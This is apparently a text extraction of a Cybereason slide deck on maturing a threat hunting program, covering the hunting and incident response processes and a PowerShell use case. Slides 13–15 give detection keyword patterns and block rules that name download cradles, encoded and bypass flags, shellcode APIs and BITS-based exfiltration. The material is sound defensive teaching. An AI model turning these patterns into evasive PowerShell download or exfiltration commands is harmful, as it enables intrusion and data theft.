Unraveling Multimodality with Large Language Models.pdf
Maturing your threat hunting program
1. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Threat Hunting 102: Beyond The Basics,
Maturing Your Threat Hunting Program
2. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Who Am I?
Jayson Wehrend
Senior Sales Engineer, Cybereason
Former Tech Consultant, RSA
3. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Why We’re Here Today
o Quick hunting refresher
o I’m hunting! Now what?
o Giving back & process integration
o Expanded PowerShell use case
4. Total Endpoint Protection: #1 in EDR & Next-Gen AV
REFRESHER: HUNTING DEFINED.
The process of proactively discovering
undesirable activity to illicit a positive
outcome.
5. Total Endpoint Protection: #1 in EDR & Next-Gen AV
REFRESHER: WHY?
Prepare? It’s very hard to defend what you can’t
see and don’t understand.
Be proactive? Don’t wait for the bad to happen,
then have to react to fix.
Fix stuff? Especially before it breaks!
6. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Time to Change.
Intelligence is the ability to adapt
to change.
-- Stephen Hawking
7. Total Endpoint Protection: #1 in EDR & Next-Gen AV
The
Hunting
Process
Motivation
+
Hypothesis
Data
Collection
Tooling /
Analysis
Outcomes
Automation
8. Total Endpoint Protection: #1 in EDR & Next-Gen AV
I’m Hunting! Now What?
o We’re Giving Back!
– Incidents
– Detection improvements / new collection techniques
– Prevention with confidence
– Improve response / triage
– Configuration management / compliance / audit
9. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Incident
Response
Process
Prepare
Detect
Respond
Contain /
Eradicate
Post-
Mortem /
Prevent
10. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Prepare
Detect
Respond
Contain /
Eradicate
Post-
Mortem /
Prevent
Motivation
+
Hypothesis
Data
Collection
Tooling /
Analysis
Outcomes
Automation*
Incident Response Process Hunting Process
Use blind spots/gaps as
sources of motivation +
hypothesis
High
fidelity
detections
Escalated
incident
New data collection & analysis techniques
improve triage & response SOPs
11. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Hunting: A Deeper Dive
o Previous outcomes create new motivation +
hypothesis’
o Introducing new datasets to expand previous
outcomes
o Data stacking becomes more crucial to the
journey to analysis/data science
13. Total Endpoint Protection: #1 in EDR & Next-Gen AV
File-less
Techniques
PowerShell Process
Execution
Persistence
Network
Comms
Service
Registry
Hidden
Obfuscated
Encoded
Download
Commands
Shellcode DLL
Execution
Parent/child
Profiling
Int2Ext
Profiling
DNS Queries
Service =
commandline:powershell or
.ps*
Registry =
commandline:powershell or
.ps*
commandLine:hidden|1|-nop|iex|-
invoke|ICM|scriptblock,
commandLine:`|1|^|+|$|*|&|.
commandLine:nop|nonl|nol|bypass|e|enc|ec
commandLine:DownloadFile|IWE|Invoke-WebRequest|IRM|Invoke-
RestMethod|DownloadString|BITS
commandLine:dllimport|
virtualalloc
Parent:wscript|mshta|M
SOffice|Browser|WMI*
Connections à Filter:isExternalConnection:True
URL: .ps*
DNS Query: TXT C2
DNS Query: Received vs. Transmitted Ratios
14. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Giving Back…Incident Escalation
o Incident 1: PowerShell
Web Client – Downloading
Stage 2 Payload
o Incident 2: Remote .ps
file execution /
invoking shellcode
o Incident 3: Mismatched
Services – Adversarial
use of .ps
o Incident 4: Data Exfil –
Powershell BITSTransfer
15. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Giving Back…Prevention
o Block execution of PowerShell.exe on all systems where it’s not in use for
administrative purposes
o Force specific Parent/Child Process Relationships –
MSOffice|Wscript|Mshta|Browsers|WMI spawning Powershell.exe
o Anchor PowerShell scripts to a specific server directories, block .ps* from
running directly on a system
o Use endpoint firewall to prevent PowerShell.exe from connecting to non-
approved Ips
o Block “Bypass” “Hidden” “Download String” “WebClient” “DLLImport”
“VirtualAlloc” as a command line argument for execution by an unauthorized
user
o See #2 for allowing valid applications
16. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Thank you! Questions?
jayson.wehrend@cybereason.com
@cybereason